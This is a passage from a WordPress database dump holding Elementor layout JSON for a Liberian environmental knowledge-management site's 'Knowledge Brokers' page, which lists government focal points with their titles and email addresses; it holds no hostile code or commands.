id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21823,3160,'_wp_attached_file','2020/10/WIN_20160609_11_17_46_Pro.jpg'),(21824,3160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:37:\"2020/10/WIN_20160609_11_17_46_Pro.